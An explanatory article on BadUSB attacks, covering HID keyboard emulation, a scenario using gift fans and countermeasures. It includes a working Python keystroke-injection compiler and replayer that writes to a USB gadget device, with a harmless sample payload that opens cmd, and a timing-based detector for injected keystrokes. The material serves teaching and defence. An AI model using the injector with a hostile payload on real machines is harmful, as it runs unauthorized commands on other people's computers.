BadUSB refers to USB devices that execute malicious commands on a computer by presenting themselves as a trusted input device, most often an emulated keyboard. They can be ordinary USB devices with modified firmware or microcontrollers built specifically for this purpose. Because the USB interface is ubiquitous and the attack hides behind a device class the host accepts automatically, BadUSB attacks are difficult to prevent and can cause a great deal of damage.
The biggest advantages of USB sticks, their small size and flexibility, are also their security weaknesses: they can be used inconspicuously to attack systems or to copy data without authorization.
USB interfaces are no longer found only in computers; they are increasingly built into devices of all kinds, from robot vacuum cleaners to alarm systems and industrial equipment. At the same time, most users handle USB devices every day and are thoroughly used to them, so they tend to plug them in without a second thought.
How it works
A BadUSB attack uses a microcontroller with a USB interface that can present itself to the host as a virtual device. Most commonly this is a virtual keyboard: the commands, i.e. the keystrokes, are stored on the controller in advance, and as soon as the controller is plugged into a computer they are "typed" and executed. In this way any program can be started, or a command prompt can be opened and a whole series of commands entered. Because a keyboard is a standard HID class device, the host loads no special driver and asks no questions. BadUSB is not limited to keyboard input, however; any input device can be emulated this way.
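As an added illustration (not code from the page, which names no particular hardware), the following Python shows what a keystroke-injecting controller does at the protocol level: it turns a stored script into the 8-byte USB HID boot-protocol keyboard reports that a host accepts from any keyboard. The script directives (STRING, DELAY, ENTER, chords such as GUI r) and the sample script are defined here for the example; the output path /dev/hidg0 assumes a Linux USB gadget with a configfs HID function, which is one way such a device can be built.

```python
"""Keystroke injection at the USB HID level (added example, not from the page).

A USB keyboard sends 8-byte boot-protocol reports: byte 0 is a modifier
bitmask, byte 1 is reserved, bytes 2-7 hold up to six pressed key usage codes.
A controller that "types" a stored command emits one press report and one
all-zero release report per character. Writing these to /dev/hidg0 assumes a
Linux USB gadget with a configfs HID function (assumption, not from the page).
"""
import time
from typing import List, NamedTuple, Union

MOD_LCTRL, MOD_LSHIFT, MOD_LALT, MOD_LGUI = 0x01, 0x02, 0x04, 0x08
RELEASE = bytes(8)  # all-zero report: nothing pressed

# Keyboard/Keypad usage page (0x07) codes for unshifted US-layout characters.
_PLAIN = {c: 0x04 + i for i, c in enumerate("abcdefghijklmnopqrstuvwxyz")}
_PLAIN.update({c: 0x1E + i for i, c in enumerate("123456789")})
_PLAIN.update({"0": 0x27, "\n": 0x28, "\t": 0x2B, " ": 0x2C, "-": 0x2D,
               "=": 0x2E, "[": 0x2F, "]": 0x30, "\\": 0x31, ";": 0x33,
               "'": 0x34, "`": 0x35, ",": 0x36, ".": 0x37, "/": 0x38})
# Characters that need Shift, mapped to the unshifted key that produces them.
_SHIFTED = dict(zip('!@#$%^&*()_+{}|:"~<>?', "1234567890-=[]\\;'`,./"))
_NAMED = {"ENTER": 0x28, "ESC": 0x29, "TAB": 0x2B, "SPACE": 0x2C}
_MODS = {"CTRL": MOD_LCTRL, "SHIFT": MOD_LSHIFT, "ALT": MOD_LALT, "GUI": MOD_LGUI}


def report(code: int, modifiers: int = 0) -> bytes:
    """One 8-byte report with a single key (plus modifiers) held down."""
    return bytes([modifiers, 0, code, 0, 0, 0, 0, 0])


def char_reports(ch: str) -> List[bytes]:
    """Press-then-release reports that type one character on a US layout."""
    mods = 0
    if ch in _SHIFTED:
        mods, ch = MOD_LSHIFT, _SHIFTED[ch]
    elif ch.isupper():
        mods, ch = MOD_LSHIFT, ch.lower()
    if ch not in _PLAIN:
        raise ValueError(f"no usage code for {ch!r}")
    return [report(_PLAIN[ch], mods), RELEASE]


class Step(NamedTuple):
    kind: str                  # "report" (bytes to send) or "delay" (seconds)
    data: Union[bytes, float]


def compile_script(script: str) -> List[Step]:
    """Turn a stored keystroke script into the sequence the controller emits.

    Directive names are defined for this example only: STRING <text>,
    DELAY <ms>, ENTER/ESC/TAB/SPACE, and chords such as 'GUI r' or 'CTRL ALT t'.
    """
    steps: List[Step] = []
    for line in script.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        head, _, rest = line.partition(" ")
        if head == "STRING":
            for ch in rest:
                steps += [Step("report", r) for r in char_reports(ch)]
        elif head == "DELAY":
            steps.append(Step("delay", int(rest) / 1000))
        elif head in _NAMED and not rest:
            steps += [Step("report", report(_NAMED[head])), Step("report", RELEASE)]
        else:  # chord: zero or more modifier names followed by one key name
            *mod_names, key = line.split()
            mods = 0
            for name in mod_names:
                mods |= _MODS[name]
            code = _NAMED.get(key) or _PLAIN[key.lower()]
            steps += [Step("report", report(code, mods)), Step("report", RELEASE)]
    return steps


def replay(steps: List[Step], hid_path: str = "/dev/hidg0") -> int:
    """Send the sequence to a gadget HID endpoint; returns reports written."""
    written = 0
    with open(hid_path, "wb", buffering=0) as hid:
        for step in steps:
            if step.kind == "delay":
                time.sleep(step.data)
            else:
                hid.write(step.data)
                written += 1
    return written


# Constructed sample payload: open the Windows Run box, start cmd, run a
# harmless command. A real attacker would store something far less benign.
SAMPLE_SCRIPT = """\
DELAY 500
GUI r
DELAY 300
STRING cmd
ENTER
DELAY 800
STRING echo BadUSB demo > %TEMP%\\demo.txt
ENTER
"""

if __name__ == "__main__":
    compiled = compile_script(SAMPLE_SCRIPT)
    print(f"{sum(s.kind == 'report' for s in compiled)} HID reports, "
          f"{sum(s.kind == 'delay' for s in compiled)} delays")
```

The point to notice is how little the device needs: no driver, no exploit, just the report format every keyboard uses. The DELAY lines exist because the payload must wait for the Run box or shell to appear before typing into it, which is also why a victim sees windows opening and text appearing "by itself".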
Attack scenario
Controllers of this kind have been hidden inside inconspicuous devices such as USB-powered fans, which an attacker then hands out to employees of the target company on hot days. As soon as a fan is plugged in, the stored commands run; to the user it looks as though the computer is operating itself. The attack is just as serious on devices that have a USB port but are not perceived as computers, for example smart TVs, multifunction printers, alarm systems or production control systems.
Countermeasures
Because operating systems are designed to accept input devices immediately and without further configuration, a BadUSB device faces no real obstacle. The malicious payload also lives in the device's own firmware or controller memory, an area the operating system cannot read, so it cannot be scanned before it executes; the host only ever sees keystrokes from what looks like a keyboard.
Unknown USB devices should therefore be connected only with great caution, and any unusual behaviour should be watched for: a new-hardware notification or sound for a device class you did not expect (for example a keyboard registering when you plugged in a storage stick), or windows opening and text appearing on their own. If anomalies are observed, the device must be removed immediately. Where devices with USB ports are installed in publicly accessible areas, the ports should be disabled in configuration or protected by physical measures.
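The "unusual behaviour" above can also be checked for automatically. As an added example (not from the page), the Python below parses raw Linux evdev records, as read from /dev/input/eventN, and flags bursts of key presses arriving faster than a person can type, which is how a replayed keystroke payload looks to the host. The 30 ms threshold, the 8-key burst length, the 64-bit input_event layout and the sample event streams are my own assumptions and constructed data.

```python
"""Detecting replayed keystrokes by their timing (added example, not from the page).

A BadUSB controller replays stored keystrokes with only a few milliseconds
between keys, far below what human typing produces. This module parses raw
Linux evdev records as read from /dev/input/eventN and reports bursts of key
presses that arrive faster than a person could type them. The 24-byte
64-bit input_event layout, the 30 ms threshold and the 8-key burst length
are assumptions chosen for the example.
"""
import struct
from typing import Iterator, List, Tuple

EV_KEY = 0x01           # event type: key press/release
KEY_PRESS = 1           # value: 1 = press, 0 = release, 2 = autorepeat
EVENT_FMT = "<qqHHi"    # tv_sec, tv_usec, type, code, value (64-bit Linux)
EVENT_SIZE = struct.calcsize(EVENT_FMT)  # 24 bytes

MAX_HUMAN_GAP_S = 0.030  # gaps shorter than 30 ms are treated as non-human
BURST_LEN = 8            # this many consecutive fast presses raise an alert


def parse_events(raw: bytes) -> Iterator[Tuple[float, int, int, int]]:
    """Yield (timestamp, type, code, value) for each complete record."""
    for off in range(0, len(raw) - len(raw) % EVENT_SIZE, EVENT_SIZE):
        sec, usec, etype, code, value = struct.unpack_from(EVENT_FMT, raw, off)
        yield sec + usec / 1_000_000, etype, code, value


def key_press_times(raw: bytes) -> List[float]:
    """Timestamps of key-down events only; releases and autorepeat are ignored."""
    return [ts for ts, etype, _, value in parse_events(raw)
            if etype == EV_KEY and value == KEY_PRESS]


def find_injection_bursts(raw: bytes) -> List[Tuple[float, float, int]]:
    """Return (start, end, presses) for every run of at least BURST_LEN presses
    in which every gap to the previous press is below MAX_HUMAN_GAP_S."""
    times = key_press_times(raw)
    bursts, run_start = [], 0
    for i in range(1, len(times) + 1):
        fast = i < len(times) and times[i] - times[i - 1] < MAX_HUMAN_GAP_S
        if not fast:  # a slow gap (or the end of the data) closes the run
            if i - run_start >= BURST_LEN:
                bursts.append((times[run_start], times[i - 1], i - run_start))
            run_start = i
    return bursts


def make_stream(start: float, gaps: List[float], code: int = 30) -> bytes:
    """Constructed evdev byte stream: one press and release per gap (KEY_A=30)."""
    out, t = bytearray(), start
    for gap in gaps:
        t += gap
        for value, when in ((KEY_PRESS, t), (0, t + 0.001)):
            sec = int(when)
            usec = int(round((when - sec) * 1_000_000))
            out += struct.pack(EVENT_FMT, sec, usec, EV_KEY, code, value)
    return bytes(out)


# Constructed samples: a person typing ten keys, then a controller typing twelve.
HUMAN_SAMPLE = make_stream(1_700_000_000.0,
                           [0.18, 0.22, 0.15, 0.30, 0.12, 0.25, 0.19, 0.21, 0.17, 0.28])
INJECTED_SAMPLE = make_stream(1_700_000_010.0, [0.005] * 12)
MIXED_SAMPLE = HUMAN_SAMPLE + INJECTED_SAMPLE


def scan_capture(path: str) -> List[Tuple[float, float, int]]:
    """Scan a saved capture, e.g. from `cat /dev/input/event3 > keys.bin`."""
    with open(path, "rb") as f:
        return find_injection_bursts(f.read())


if __name__ == "__main__":
    for name, sample in (("human", HUMAN_SAMPLE), ("mixed", MIXED_SAMPLE)):
        print(name, find_injection_bursts(sample))
```

Timing alone is a heuristic: a payload that deliberately pauses between keys to mimic a human, or a legitimate barcode scanner (which is also a HID keyboard), will fool or trip it respectively. It is nevertheless a cheap tripwire that catches the "computer taking care of itself" moment described above, and a hit is a good trigger for unplugging the device or blocking the new input device.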
There are also USB adapters with no data lines that pass only power; they allow a smartphone to be charged safely from a public USB socket, for example. Adapters that admit only certain USB device types and block all others also exist, but they noticeably reduce the available bandwidth.